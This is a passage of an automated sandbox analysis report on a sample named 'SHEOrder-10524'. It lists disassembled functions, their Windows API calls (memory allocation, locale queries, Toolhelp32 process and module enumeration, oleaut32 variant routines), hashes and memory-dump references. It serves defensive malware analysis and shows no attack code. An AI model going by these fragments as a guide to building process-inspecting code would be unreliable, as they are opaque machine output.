                                                                                                                                                                    • API String ID: 2982266575-0
                                                                                                                                                                    • Opcode ID: 1e02ddfeee5524c42543f4bb2afd7c5115a6892cde00033e8840c7e2bbe3155b
                                                                                                                                                                    • Instruction ID: 594dcc321f6d4d2bccf6e016625108bcefd88c4f72904bd64137400e187a0479
                                                                                                                                                                    • Opcode Fuzzy Hash: 1e02ddfeee5524c42543f4bb2afd7c5115a6892cde00033e8840c7e2bbe3155b
                                                                                                                                                                    • Instruction Fuzzy Hash: 8EC092F87E53007EFA206AA81CC2FB3659DD745B01F601816B705EE2C1E6F2A8251660
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C4BFC Relevance: 1.5, APIs: 1, Instructions: 10memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SysAllocStringLen.OLEAUT32(00000000,?), ref: 028C4C03
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocString
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2525500382-0
                                                                                                                                                                    • Opcode ID: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                                    • Instruction ID: fe37d7428ef9f2fe97abfd30f95975e6c7ca9ade66e8c8088533b471bb90e9cd
                                                                                                                                                                    • Opcode Fuzzy Hash: a58847c83cd719dccc7eadc7ea48a36911e6046ec6b401b7504d2a9bf001b2b2
                                                                                                                                                                    • Instruction Fuzzy Hash: 6FB0123C20820518FB5411620E50732404C4BA0289FB8005DAF1EC80D5FF31D081983F
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C15CC Relevance: 1.3, APIs: 1, Instructions: 38memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,00140000,00001000,00000004,?,028C1A03,?,028C1FC1), ref: 028C15E2
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 1b108d547b7cba193e25307e5e79e4f07d8b585d1e41530e36216c6cfdba8fe5
                                                                                                                                                                    • Instruction ID: 01b65b8359b87e5cc3cb6af5ea83525b7128e129762dd16dee6d027bd52b60ba
                                                                                                                                                                    • Opcode Fuzzy Hash: 1b108d547b7cba193e25307e5e79e4f07d8b585d1e41530e36216c6cfdba8fe5
                                                                                                                                                                    • Instruction Fuzzy Hash: DBF049F8B463004FDB15DF7999843117ADAE7C9345F21857DD60DDB39AE771842A8B00
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C1682 Relevance: 1.3, APIs: 1, Instructions: 36memoryCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualAlloc.KERNEL32(00000000,?,00101000,00000004,?,?,?,?,028C1FC1), ref: 028C16A4
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                                                    • Opcode ID: 8f0b7949b41564294fc865ac3d312acd5095eeb9a336537b9c367aca8b924f77
                                                                                                                                                                    • Instruction ID: cefafbd2e9883f60a41640a274c44c6918b8bb9d624fd531e5b30d398a1852e2
                                                                                                                                                                    • Opcode Fuzzy Hash: 8f0b7949b41564294fc865ac3d312acd5095eeb9a336537b9c367aca8b924f77
                                                                                                                                                                    • Instruction Fuzzy Hash: 49F090FAB447956BDB209E5A9CC4B92BBA8FB00314F150179E90CD7345D774E8148B98
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C16E6 Relevance: 1.3, APIs: 1, Instructions: 25COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • VirtualFree.KERNEL32(?,00000000,00008000,?,?,00000000,028C1FE4), ref: 028C1704
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeVirtual
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1263568516-0
                                                                                                                                                                    • Opcode ID: c0eb346862149d14908fa26484b01688dc3c7627efb2434cca4194003cdbe3f7
                                                                                                                                                                    • Instruction ID: 41bb902969d66d5d5c62278d381488426f86cc2bdfa448df10466879734ccd90
                                                                                                                                                                    • Opcode Fuzzy Hash: c0eb346862149d14908fa26484b01688dc3c7627efb2434cca4194003cdbe3f7
                                                                                                                                                                    • Instruction Fuzzy Hash: 1AE04F7D3003016FD7105A7D5DC8B12BAD8AB44654F344479F509DB246D370E8148B64
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Non-executed Functions

                                                                                                                                                                    Function 028D9B94 Relevance: 59.6, APIs: 17, Strings: 17, Instructions: 99libraryloaderCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,00000002,028D9E1B,?,?,028D9EAD,00000000,028D9F89), ref: 028D9BA8
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,CreateToolhelp32Snapshot), ref: 028D9BC0
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListFirst), ref: 028D9BD2
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32ListNext), ref: 028D9BE4
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32First), ref: 028D9BF6
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Heap32Next), ref: 028D9C08
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Toolhelp32ReadProcessMemory), ref: 028D9C1A
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32First), ref: 028D9C2C
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32Next), ref: 028D9C3E
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32FirstW), ref: 028D9C50
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Process32NextW), ref: 028D9C62
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32First), ref: 028D9C74
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Thread32Next), ref: 028D9C86
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32First), ref: 028D9C98
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32Next), ref: 028D9CAA
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32FirstW), ref: 028D9CBC
                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,Module32NextW), ref: 028D9CCE
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressProc$HandleModule
                                                                                                                                                                    • String ID: CreateToolhelp32Snapshot$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Module32First$Module32FirstW$Module32Next$Module32NextW$Process32First$Process32FirstW$Process32Next$Process32NextW$Thread32First$Thread32Next$Toolhelp32ReadProcessMemory$kernel32.dll
                                                                                                                                                                    • API String ID: 667068680-597814768
                                                                                                                                                                    • Opcode ID: 0c3538f7e696272063f7a9bbab7d2b773f046206e25feff5d4cdf45934380b63
                                                                                                                                                                    • Instruction ID: c617261a92baa0a28d6e0cba63406468ea36cb5df914e7ef2a0902a774c73e14
                                                                                                                                                                    • Opcode Fuzzy Hash: 0c3538f7e696272063f7a9bbab7d2b773f046206e25feff5d4cdf45934380b63
                                                                                                                                                                    • Instruction Fuzzy Hash: C331FCBCA852649FFB10BFA8D885E2933EDAB467007511969F419DF305E778E418CF12
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C58CC Relevance: 24.6, APIs: 11, Strings: 3, Instructions: 139stringlibraryfileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C58E9
                                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetLongPathNameA), ref: 028C5900
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?), ref: 028C5930
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C5994
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59CA
                                                                                                                                                                    • FindFirstFileA.KERNEL32(?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59DD
                                                                                                                                                                    • FindClose.KERNEL32(?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59EF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000,028EB790), ref: 028C59FB
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0,028C0000), ref: 028C5A2F
                                                                                                                                                                    • lstrlenA.KERNEL32(?,?,?,00000104,?,?,?,?,?,?,00000001,?,?,?,kernel32.dll,028C6BD0), ref: 028C5A3B
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,?,?,?,?,00000104,?,?,?,?,?,?,00000001,?,?), ref: 028C5A5D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                                                                                                    • String ID: GetLongPathNameA$\$kernel32.dll
                                                                                                                                                                    • API String ID: 3245196872-1565342463
                                                                                                                                                                    • Opcode ID: ed7c6c4611d8e4e69edb528536b6c1f82ee73dad1f725820ce7c6c2aa9c9a3ab
                                                                                                                                                                    • Instruction ID: fccd7edac98ad664cb082de3c69adc72d706b7d191910b98935b1a89f2c13c46
                                                                                                                                                                    • Opcode Fuzzy Hash: ed7c6c4611d8e4e69edb528536b6c1f82ee73dad1f725820ce7c6c2aa9c9a3ab
                                                                                                                                                                    • Instruction Fuzzy Hash: 58415F7ED00218ABDF10DAE8CCC8ADEB7ADAF08344F6445A9A549E7241D738EF448F54
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C5B9C Relevance: 15.1, APIs: 10, Instructions: 98stringlibrarythreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • lstrcpynA.KERNEL32(?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000), ref: 028C5BAC
                                                                                                                                                                    • GetThreadLocale.KERNEL32(00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?), ref: 028C5BB9
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019), ref: 028C5BBF
                                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000), ref: 028C5BEA
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C31
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C41
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?), ref: 028C5C69
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?,00000105,80000001,Software\Borland\Delphi\Locales), ref: 028C5C79
                                                                                                                                                                    • lstrcpynA.KERNEL32(00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?,00000005,?,?), ref: 028C5C9F
                                                                                                                                                                    • LoadLibraryExA.KERNEL32(?,00000000,00000002,00000001,?,00000105,?,00000000,00000002,00000001,?,00000105,?,00000000,00000003,?), ref: 028C5CAF
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: lstrcpyn$LibraryLoad$Locale$InfoThreadlstrlen
                                                                                                                                                                    • String ID: Software\Borland\Delphi\Locales$Software\Borland\Locales
                                                                                                                                                                    • API String ID: 1599918012-2375825460
                                                                                                                                                                    • Opcode ID: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                    • Instruction ID: 88991048baa02a8ddb48026bc646f947b5a66d48469d23bd162bebc7b4ad58b9
                                                                                                                                                                    • Opcode Fuzzy Hash: ff9cdef5e101b3bd86c326f77e31ad3179ad4c9dbc2056fe31fd781e488937c1
                                                                                                                                                                    • Instruction Fuzzy Hash: E13184BDE4011C2AFF25D6B8DC89BDEB6AD4B04380F6401A99648F6185D778EF848F51
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C7F8E Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetDiskFreeSpaceA.KERNEL32(?,?,?,?,?), ref: 028C7FB1
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: DiskFreeSpace
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1705453755-0
                                                                                                                                                                    • Opcode ID: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                                                                    • Instruction ID: c9cf39e939768046a42d86fe0dde7e2ef03f2a1055ac4f8d714092c85866a2ff
                                                                                                                                                                    • Opcode Fuzzy Hash: 6e429fbe217d4c190c611f9e0514da060d02eb90535dbfb5c867c9946ec146bb
                                                                                                                                                                    • Instruction Fuzzy Hash: 2D1100B5A00209AFDB00CFA9C881DAFF7F9EFC8300B14C569A408E7254E7319A018B90
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CA780 Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(?,?,?,00000100), ref: 028CA79E
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                                    • Instruction ID: a742a2c12f52007bd259335c02a2ee2a2398186611fe553f06b3f1fcc2bd929b
                                                                                                                                                                    • Opcode Fuzzy Hash: 58c1c4a77dddcd1d3feeefb456d2c268f454cde5e81dc923aa3144afb07d55d1
                                                                                                                                                                    • Instruction Fuzzy Hash: 96E0D87D70021817D314A95C5C90DF6726DA75C710F20417EBD48C7341EFB0DD804AE5
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CB748 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetVersionExA.KERNEL32(?,028EA106,00000000,028EA11E), ref: 028CB756
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Version
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 1889659487-0
                                                                                                                                                                    • Opcode ID: c07fd1f28872ad038c6979fca20010ca5ef19f781ea45afaaa3b290fa5bb9b2f
                                                                                                                                                                    • Instruction ID: 6637831c3fe151ff94b4b7eb03abe38880110cf8fda18755c3456c01eb221826
                                                                                                                                                                    • Opcode Fuzzy Hash: c07fd1f28872ad038c6979fca20010ca5ef19f781ea45afaaa3b290fa5bb9b2f
                                                                                                                                                                    • Instruction Fuzzy Hash: B8F07F7C944702ABCB50DF28D84261577E5FB89618F14892DE899CAB80E734D8548F52
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CA7CC Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLocaleInfoA.KERNEL32(00000000,0000000F,?,00000002,0000002C,?,?,00000000,028CBE2E,00000000,028CC047,?,?,00000000,00000000), ref: 028CA7DF
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: InfoLocale
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 2299586839-0
                                                                                                                                                                    • Opcode ID: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                    • Instruction ID: 9dba74365196c05f24c6e4997e18ee8fd2bc0e5c50adbebfb573617a43f62752
                                                                                                                                                                    • Opcode Fuzzy Hash: c1878156b55314fbd131a135bc1448ea00a65f38ae630a1894243e0b3e8d53f1
                                                                                                                                                                    • Instruction Fuzzy Hash: E9D05B6E30D1643AA224555E1D44D775AECDAC5761F10443DB588C6201D310CC059671
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C91C8 Relevance: 1.5, APIs: 1, Instructions: 6timeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: LocalTime
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 481472006-0
                                                                                                                                                                    • Opcode ID: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                                                                    • Instruction ID: 44d2cc4acf89573b8c847e09e6f5a52e78866faa318030a8423ca2bb819e4ee9
                                                                                                                                                                    • Opcode Fuzzy Hash: 6ad7acb16520d0ee23af696196ffd6f674aa908e5bbfab1d4a9cc499efc34d38
                                                                                                                                                                    • Instruction Fuzzy Hash: E3A01208404C31018140371C0C0253530445840620FD4076468F8802D1FA2D412440D3
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028C20C4 Relevance: .1, Instructions: 94COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID:
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID:
                                                                                                                                                                    • Opcode ID: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                    • Instruction ID: d9ca5c35b085eece62e9f9345e2df5b5b2dbbbf6d6fdc43b5a6e4acac797e09a
                                                                                                                                                                    • Opcode Fuzzy Hash: b6d55ffda06be9354f45c85752ae1684c48c89628f5d423d6395e0bf3078b847
                                                                                                                                                                    • Instruction Fuzzy Hash: 44317E3213659B4EC7088B3CC8514ADAB93BE937353A843B7C071CB5D7D7B5A26E8290
                                                                                                                                                                    Uniqueness

                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                    Function 028CD250 Relevance: 42.1, APIs: 1, Strings: 23, Instructions: 141COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetModuleHandleA.KERNEL32(oleaut32.dll), ref: 028CD259
                                                                                                                                                                      • Part of subcall function 028CD224: GetProcAddress.KERNEL32(00000000), ref: 028CD23D
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.1720484303.00000000028C1000.00000020.00001000.00020000.00000000.sdmp, Offset: 028C0000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.1720466208.00000000028C0000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.1720579954.00000000028EB000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_28c0000_SHEOrder-10524.jbxd
                                                                                                                                                                    Yara matches
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: AddressHandleModuleProc
                                                                                                                                                                    • String ID: VarAdd$VarAnd$VarBoolFromStr$VarBstrFromBool$VarBstrFromCy$VarBstrFromDate$VarCmp$VarCyFromStr$VarDateFromStr$VarDiv$VarI4FromStr$VarIdiv$VarMod$VarMul$VarNeg$VarNot$VarOr$VarR4FromStr$VarR8FromStr$VarSub$VarXor$VariantChangeTypeEx$oleaut32.dll
                                                                                                                                                                    • API String ID: 1646373207-1918263038
